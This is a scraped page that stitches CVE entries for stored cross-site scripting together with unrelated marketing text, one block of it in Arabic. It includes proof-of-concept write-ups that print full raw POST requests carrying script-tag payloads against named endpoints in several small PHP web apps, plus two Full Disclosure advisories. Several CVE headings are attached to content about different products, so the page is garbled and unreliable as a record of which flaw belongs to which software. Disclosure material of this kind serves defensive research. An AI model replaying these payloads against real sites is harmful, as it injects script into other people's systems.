A stored XSS vulnerability in MaianAffiliate v.1.0 allows an authenticated attacker for arbitrary JavaScript code execution in the context of authenticated and unauthenticated users through the MaianAffiliate admin panel.

   

**Welcome to Maian Affiliate**

Free PHP affiliate system. Enhance Your Product Sales.

Maian Affiliate is a FREE, simple, yet powerful **php referral system** system written in PHP. It enables your site visitors to make money from your own products via a simple **php affiliate system**. Maian Affiliate can be used with most websites and ecommerce systems via an easy to use API.

This software was written with ease of use in mind and contains many great features. It\`s a powerful affiliate system written with some of the latest technology and all presented in a cosmetically appealing interface to provide your business with a stable, **php affiliate system**.

Maian Affiliate is self hosted and enables you to promote your products without worrying about third party subscriptions. A one off payment unlocks the full feature set, but you can use the free version as long as you like.

Think affiliate software is too complicated? Maian Affiliate, a **php referral system** might be what exactly what you were looking for.

Why not give it a try today?

**LATEST RELEASE**

**v1.0** was released on 30 October 2018

New version (**v1.1**) is coming soon. More info.

Want notification of new releases? More Info.  
Save Up To 40% with Software Bundles More Info.

**STANDARD FEATURES**

The following come as standard in all versions of Maian Affiliate, a free **php affiliate sales** system.

*   Easy to use PHP affiliate referral system
*   Enhance your product visibility with affiliate promotion
*   Works with the majority of PHP payment gateways/websites
*   Affiliate can easily see overview of sales and referrals
*   Approve accounts and commissions to avoid fraud issues
*   Easy to use API for referrals and commission logging
*   PHP7.3 supported (7.4 & 8.0 Coming Soon)
*   Fast, responsive HTML5 system for mobiles / tablets.

**Main Features - Maian Affiliate - Free PHP Referral System**

**Product Promotion**

Enhance your product sales with affiliate referrals. You\`re happy and your affiliates are happy.

**Mobile Ready**

HTML5 responsive layout for tablets and mobiles via Twitter Bootstrap. Web based, so works in all mobile browsers.

**Powerful API**

Create referrals and commissions via the Maian Affiliate api. Once it\`s set up, it will manage itself.

**Affiliates**

Easy to use account area for affiliates to see promotional data and overviews of sales and commissions.

**Testimonials - Maian Affiliate - Free PHP Affiliate System**

I just bought second license in a week! This script is very easy to use, and if you are a programmer, you can customize it in so many ways. I am very pleased with the auto generated code that you can copy and paste easily on your product site. The best thing that I've not seen in other script is, you can create multiple product in the script and use the code in multiple site. Keep up the good work and I hope I will see some great updates soon.

I use Maian Music and Maian Affiliate, they work in conjunction with each other and I have found them really helpful for me. The support is second to none. The free trial is a super idea to test out if any of the Maian software is suitable for your use. I purchased commercial licences for my Maian software, low cost, good value and I highly recommend the products and the company.

\- Denis Steer

**Recent Support Forum Posts - Maian Affiliate - Free PHP Product Promotion**

CVE-2021-41420: Maian Affiliate

A cross-site scripting vulnerability in the ads comment section of Haraj v3.7 allows attackers to execute arbitrary web scripts or HTML via a crafted POST request.

**CVE-2022-31298**

Haraj Script 3.7 - Authenticated Stored XSS

**Exploit Title: Haraj Script 3.7 - Authenticated Stored XSS****Date: 2022-06-13****CVE: CVE-2022-31298****Exploit Author: Abdulaziz Saad (@b4zb0z)****Vendor Homepage: https://angtech.org/****Software Link: https://angtech.org/product/view/3****Version: 3.7****Tested on: LAMP, Ubuntu**

\[#\] Exploitation : exploit ads comment section directly with js payload

CVE-2022-31298: GitHub - bigzooooz/CVE-2022-31298: Haraj Script 3.7 - Authenticated Stored XSS

Zoo Management System v1.0 is vulnerable to Cross Site Scripting (XSS) via zms/admin/public_html/save_animal?an_id=24.

Permalink

**zoo-management-system - Cross-site Scripting (XSS)**

vendors: https://www.sourcecodester.com/php/15347/zoo-management-system-source-code-php-mysql-database.html

Date: 2022-05-07

Vulnerability File: /zms/admin/public\_html/save\_animal?an\_id=24

Vulnerability location: /zms/admin/public\_html/save\_animal?an\_id=24, an\_given\_name

\[+\] Payload: "><sCrIpT>alert(1)</sCrIpT>

Tested on Windows 10, XAMPP

    POST http://192.168.2.102/zms/admin/public_html/save_animal?an_id=24 HTTP/1.1
    Host: 192.168.2.102
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko/20100101 Firefox/100.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
    Accept-Language: en,zh-CN;q=0.8,zh;q=0.7,zh-TW;q=0.5,zh-HK;q=0.3,en-US;q=0.2
    Content-Type: multipart/form-data; boundary=---------------------------154827300217808672181041720663
    Content-Length: 4518
    Origin: http://192.168.2.102
    Connection: close
    Referer: http://192.168.2.102/zms/admin/public_html/save_animal?an_id=24
    Cookie: PHPSESSID=vpohrtulukshjgjlje1jbeavrj
    Upgrade-Insecure-Requests: 1
    
    -----------------------------154827300217808672181041720663
    Content-Disposition: form-data; name="animal_id"
    
    24
    -----------------------------154827300217808672181041720663
    Content-Disposition: form-data; name="an_given_name"
    
    	 "><sCrIpT>alert(1)</sCrIpT>
    -----------------------------154827300217808672181041720663
    Content-Disposition: form-data; name="an_species_name"
    
    Acinonyx jubatus
    -----------------------------154827300217808672181041720663
    Content-Disposition: form-data; name="an_dob"
    
    2020-04-04
    -----------------------------154827300217808672181041720663
    Content-Disposition: form-data; name="an_gender"
    
    m
    -----------------------------154827300217808672181041720663
    Content-Disposition: form-data; name="an_avg_lifespan"
    
    20 Years
    -----------------------------154827300217808672181041720663
    Content-Disposition: form-data; name="class_id"
    
    1
    -----------------------------154827300217808672181041720663
    Content-Disposition: form-data; name="location_id"
    
    4
    -----------------------------154827300217808672181041720663
    Content-Disposition: form-data; name="an_dietary_req"
    
    Meat
    -----------------------------154827300217808672181041720663
    Content-Disposition: form-data; name="an_natural_habitat"
    
    Grassland
    -----------------------------154827300217808672181041720663
    Content-Disposition: form-data; name="an_pop_dist"
    
    20,000 in Asia
    -----------------------------154827300217808672181041720663
    Content-Disposition: form-data; name="an_joindate"
    
    2020-04-11
    -----------------------------154827300217808672181041720663
    Content-Disposition: form-data; name="an_height"
    
    12
    -----------------------------154827300217808672181041720663
    Content-Disposition: form-data; name="an_weight"
    
    12
    -----------------------------154827300217808672181041720663
    Content-Disposition: form-data; name="an_description"
    
    lorem ipsum dolor sit amet
    -----------------------------154827300217808672181041720663
    Content-Disposition: form-data; name="images[]"; filename=""
    Content-Type: application/octet-stream
    
    
    -----------------------------154827300217808672181041720663
    Content-Disposition: form-data; name="an_med_record"
    
    
    -----------------------------154827300217808672181041720663
    Content-Disposition: form-data; name="an_transfer"
    
    
    -----------------------------154827300217808672181041720663
    Content-Disposition: form-data; name="an_transfer_reason"
    
    
    -----------------------------154827300217808672181041720663
    Content-Disposition: form-data; name="an_death_date"
    
    
    -----------------------------154827300217808672181041720663
    Content-Disposition: form-data; name="an_death_cause"
    
    
    -----------------------------154827300217808672181041720663
    Content-Disposition: form-data; name="an_incineration"
    
    
    -----------------------------154827300217808672181041720663
    Content-Disposition: form-data; name="m_gest_period"
    
    2 months
    -----------------------------154827300217808672181041720663
    Content-Disposition: form-data; name="m_category"
    
    Clawed Mammal
    -----------------------------154827300217808672181041720663
    Content-Disposition: form-data; name="m_avg_body_temp"
    
    34
    -----------------------------154827300217808672181041720663
    Content-Disposition: form-data; name="b_nest_const"
    
    
    -----------------------------154827300217808672181041720663
    Content-Disposition: form-data; name="b_clutch_size"
    
    
    -----------------------------154827300217808672181041720663
    Content-Disposition: form-data; name="b_wingspan"
    
    
    -----------------------------154827300217808672181041720663
    Content-Disposition: form-data; name="b_color_variant"
    
    
    -----------------------------154827300217808672181041720663
    Content-Disposition: form-data; name="f_body_temp"
    
    
    -----------------------------154827300217808672181041720663
    Content-Disposition: form-data; name="f_water_type"
    
    
    -----------------------------154827300217808672181041720663
    Content-Disposition: form-data; name="f_color_variant"
    
    
    -----------------------------154827300217808672181041720663
    Content-Disposition: form-data; name="rep_type"
    
    
    -----------------------------154827300217808672181041720663
    Content-Disposition: form-data; name="clutch_size"
    
    
    -----------------------------154827300217808672181041720663
    Content-Disposition: form-data; name="num_offspring"
    
    
    -----------------------------154827300217808672181041720663
    Content-Disposition: form-data; name="submit"
    
    
    -----------------------------154827300217808672181041720663--

CVE-2022-31914: 0525/xss.md at main · mikeccltt/0525

A cross-site scripting vulnerability in the DM Section component of Haraj v3.7 allows attackers to execute arbitrary web scripts or HTML via a crafted POST request.

**اعمالنا في البرمجة**

**موقع حراج التميز لبيع الأغنام**

عرض

**موقع الجدير للتقييم المالي**

عرض

**اعمالنا في تحت التطوير**

**سكربت التذاكر NextTicket**

عرض

**سكربت الأنمي - NextAnime V1.0**

عرض

  
**خطوات الأشتراك**

**اختر الخدمة**

قم بأختيار الخدمات التى ترغب بها

**التسجيل بالموقع**

امتلك عضوية في الموقع وسجل دخولك

**اضف طلباتك**

اختر ما تريد في سلتك الخاصة

**سداد الفاتورة**

أختار ما يناسبك من وسائل الدفع

  

  
**آراء عملائنا الكرام**

Previous Next

:( شكراً لكم اخواني الله يعطيكم العافية شكرا جزيلا لكم وعلى سرعة ردكم بارك الله فيكم

"موقع حراجات"

الله يعطيك الف عافيه يارب ما قصرت

"حراج الخرج"

شكراً لكم على سرعة الرد والتعديل وايضاً التحديثات على السكربت

"حراج القطيف"

CVE-2022-31300: زوايا التقنية

Online Fire Reporting System v1.0 is vulnerable to Cross Site Scripting (XSS) via /ofrs/classes/Master.php.

Permalink

**online-fire-reporting-system - Cross-site Scripting (XSS)**

vendors: https://www.sourcecodester.com/php/15346/online-fire-reporting-system-phpoop-free-source-code.html

Date: 2022-05-07

Vulnerability File: /ofrs/classes/Master.php

Vulnerability location: /ofrs/classes/Master.php?f=save\_team, code

\[+\] Payload: <sCrIpT>alert(1)</sCrIpT>

Tested on Windows 10, XAMPP

    POST http://192.168.2.102/ofrs/classes/Master.php?f=save_team HTTP/1.1
    Host: 192.168.2.102
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko/20100101 Firefox/100.0
    Accept: application/json, text/javascript, */*; q=0.01
    Accept-Language: en,zh-CN;q=0.8,zh;q=0.7,zh-TW;q=0.5,zh-HK;q=0.3,en-US;q=0.2
    X-Requested-With: XMLHttpRequest
    Content-Type: multipart/form-data; boundary=---------------------------12232441784418479012629232838
    Content-Length: 660
    Origin: http://192.168.2.102
    Connection: close
    Referer: http://192.168.2.102/ofrs/admin/?page=teams/manage_team&id=6
    Cookie: PHPSESSID=vpohrtulukshjgjlje1jbeavrj
    
    -----------------------------12232441784418479012629232838
    Content-Disposition: form-data; name="id"
    
    6
    -----------------------------12232441784418479012629232838
    Content-Disposition: form-data; name="code"
    
    <sCrIpT>alert(1)</sCrIpT>
    -----------------------------12232441784418479012629232838
    Content-Disposition: form-data; name="leader_name"
    
    asd
    -----------------------------12232441784418479012629232838
    Content-Disposition: form-data; name="leader_contact"
    
    asd
    -----------------------------12232441784418479012629232838
    Content-Disposition: form-data; name="members"
    
    asd
    -----------------------------12232441784418479012629232838--

CVE-2022-31906: 0525/xss.md at main · mikeccltt/0525

Online Discussion Forum Site v1.0 is vulnerable to Cross Site Scripting (XSS) via /odfs/classes/Master.php?f=save_category, name.

Permalink

**online-discussion-forum-site - Cross-site Scripting (XSS)**

vendors: https://www.sourcecodester.com/php/15337/online-discussion-forum-site-phpoop-free-source-code.html

Date: 2022-05-07

Vulnerability File: /odfs/classes/Master.php

Vulnerability location: /odfs/classes/Master.php?f=save\_category, name

\[+\] Payload: <sCrIpT>alert(1)</sCrIpT>

Tested on Windows 10, XAMPP

    POST http://192.168.2.102/odfs/classes/Master.php?f=save_category HTTP/1.1
    Host: 192.168.2.102
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko/20100101 Firefox/100.0
    Accept: application/json, text/javascript, */*; q=0.01
    Accept-Language: en,zh-CN;q=0.8,zh;q=0.7,zh-TW;q=0.5,zh-HK;q=0.3,en-US;q=0.2
    X-Requested-With: XMLHttpRequest
    Content-Type: multipart/form-data; boundary=---------------------------1173846977850966238533383019
    Content-Length: 743
    Origin: http://192.168.2.102
    Connection: close
    Referer: http://192.168.2.102/odfs/admin/?page=categories
    Cookie: PHPSESSID=vpohrtulukshjgjlje1jbeavrj
    
    -----------------------------1173846977850966238533383019
    Content-Disposition: form-data; name="id"
    
    3
    -----------------------------1173846977850966238533383019
    Content-Disposition: form-data; name="name"
    
    <sCrIpT>alert(1)</sCrIpT>
    -----------------------------1173846977850966238533383019
    Content-Disposition: form-data; name="description"
    
    Python is a high-level, interpreted, general-purpose programming language. Its design philosophy emphasizes code readability with the use of significant indentation. Python is dynamically-typed and garbage-collected.
    -----------------------------1173846977850966238533383019
    Content-Disposition: form-data; name="status"
    
    1
    -----------------------------1173846977850966238533383019--

CVE-2022-31913: 0525/xss.md at main · mikeccltt/0525

Online Tutor Portal Site v1.0 is vulnerable to Cross Site Scripting (XSS). via /otps/classes/Master.php.

Permalink

Cannot retrieve contributors at this time

**online-tutor-portal-site - Cross-site Scripting (XSS)**

vendors: https://www.sourcecodester.com/php/15339/online-tutor-portal-site-phpopp-free-source-code.html

Date: 2022-05-07

Vulnerability File: /otps/classes/Master.php

Vulnerability location: /otps/classes/Master.php?f=save\_course, name

\[+\] Payload: <sCrIpT>alert(1)</sCrIpT>

Tested on Windows 10, XAMPP

    POST http://192.168.2.102/otps/classes/Master.php?f=save_course HTTP/1.1
    Host: 192.168.2.102
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko/20100101 Firefox/100.0
    Accept: application/json, text/javascript, */*; q=0.01
    Accept-Language: en,zh-CN;q=0.8,zh;q=0.7,zh-TW;q=0.5,zh-HK;q=0.3,en-US;q=0.2
    X-Requested-With: XMLHttpRequest
    Content-Type: multipart/form-data; boundary=---------------------------23528694527160792041879147157
    Content-Length: 940
    Origin: http://192.168.2.102
    Connection: close
    Referer: http://192.168.2.102/otps/admin/?page=courses
    Cookie: PHPSESSID=vpohrtulukshjgjlje1jbeavrj
    
    -----------------------------23528694527160792041879147157
    Content-Disposition: form-data; name="id"
    
    6
    -----------------------------23528694527160792041879147157
    Content-Disposition: form-data; name="tutor_id"
    
    4
    -----------------------------23528694527160792041879147157
    Content-Disposition: form-data; name="name"
    
    <sCrIpT>alert(1)</sCrIpT>
    -----------------------------23528694527160792041879147157
    Content-Disposition: form-data; name="description"
    
    Sample Course 102
    -----------------------------23528694527160792041879147157
    Content-Disposition: form-data; name="experience"
    
    5
    -----------------------------23528694527160792041879147157
    Content-Disposition: form-data; name="status"
    
    0
    -----------------------------23528694527160792041879147157
    Content-Disposition: form-data; name="img"; filename=""
    Content-Type: application/octet-stream
    
    
    -----------------------------23528694527160792041879147157--

CVE-2022-31910: 0525/xss.md at main · mikeccltt/0525

This advisory contains mitigations for Improper Restriction of XML External Entity Reference, and Cross-site Scripting vulnerabilities in the Siemens Mendix SAML Module.

Siemens Mendix SAML Module

A vulnerability classified as problematic has been found in BestWebSoft Contact Form Plugin 4.0.0. This affects an unknown part. The manipulation leads to basic cross site scripting (Stored). It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. Upgrading to version 4.0.2 is able to address this issue. It is recommended to upgrade the affected component.

Nmap Announce Nmap Dev Full Disclosure Security Lists Internet Issues Open Source Dev

**Full Disclosure mailing list archives**

_From_: Summer of Pwnage <lists () securify nl>  
_Date_: Wed, 1 Mar 2017 07:14:29 +0100  

\------------------------------------------------------------------------
Stored Cross-Site Scripting vulnerability in Contact Form WordPress
Plugin
------------------------------------------------------------------------
Julien Rentrop, July 2016

------------------------------------------------------------------------
Abstract
------------------------------------------------------------------------
A stored Cross-Site Scripting vulnerability was found in the Contact
Form WordPress Plugin. This issue allows an attacker to perform a wide
variety of actions, such as stealing users' session tokens, or
performing arbitrary actions on their behalf. In order to exploit this
issue, the attacker has to lure/force a victim into opening a malicious
website/link.

------------------------------------------------------------------------
OVE ID
------------------------------------------------------------------------
OVE-20160712-0042

------------------------------------------------------------------------
Tested versions
------------------------------------------------------------------------
This issue was successfully tested on Contact Form by BestWebSoft
WordPress Plugin version 4.0.0.

------------------------------------------------------------------------
Fix
------------------------------------------------------------------------
This issue is partially resolved in Contact Form version 4.0.2.

------------------------------------------------------------------------
Details
------------------------------------------------------------------------
https://sumofpwn.nl/advisory/2016/stored\_cross\_site\_scripting\_vulnerability\_in\_contact\_form\_wordpress\_plugin.html

------------------------------------------------------------------------
Summer of Pwnage (https://sumofpwn.nl) is a Dutch community project. Its
goal is to contribute to the security of popular, widely used OSS
projects in a fun and educational way.

\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

**Current thread:**

*   **Stored Cross-Site Scripting vulnerability in Contact Form WordPress Plugin** _Summer of Pwnage (Feb 28)_

CVE-2017-20055: Stored Cross-Site Scripting vulnerability in Contact Form WordPress Plugin

A vulnerability was found in XYZScripts Contact Form Manager Plugin. It has been rated as problematic. Affected by this issue is some unknown functionality. The manipulation leads to basic cross site scripting. The attack may be launched remotely. The exploit has been disclosed to the public and may be used.

Nmap Announce Nmap Dev Full Disclosure Security Lists Internet Issues Open Source Dev

**Full Disclosure mailing list archives**

_From_: Summer of Pwnage <lists () securify nl>  
_Date_: Wed, 1 Mar 2017 07:13:59 +0100  

\------------------------------------------------------------------------
Cross-Site Request Forgery & Cross-Site Scripting in Contact Form
Manager WordPress Plugin
------------------------------------------------------------------------
Edwin Molenaar, July 2016

------------------------------------------------------------------------
Abstract
------------------------------------------------------------------------
 It was discovered that Contact Form Manager does not protect against
Cross-Site Request Forgery. This allows an attacker to change arbitrary
Contact Form Manager settings. In addtion, the plugin also fails to
apply proper output encoding, rendering it vulnerable to stored
Cross-Site Scripting.

------------------------------------------------------------------------
OVE ID
------------------------------------------------------------------------
OVE-20160718-0003

------------------------------------------------------------------------
Tested versions
------------------------------------------------------------------------
These issues were successfully tested on Contact Form Manager WordPress
Plugin version

------------------------------------------------------------------------
Fix
------------------------------------------------------------------------
There is currently no fix available.

------------------------------------------------------------------------
Details
------------------------------------------------------------------------
https://sumofpwn.nl/advisory/2016/cross\_site\_request\_forgery\_\_\_cross\_site\_scripting\_in\_contact\_form\_manager\_wordpress\_plugin.html

------------------------------------------------------------------------
Summer of Pwnage (https://sumofpwn.nl) is a Dutch community project. Its
goal is to contribute to the security of popular, widely used OSS
projects in a fun and educational way.

\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

**Current thread:**

*   **Cross-Site Request Forgery & Cross-Site Scripting in Contact Form Manager WordPress Plugin** _Summer of Pwnage (Feb 28)_

Tag

#xss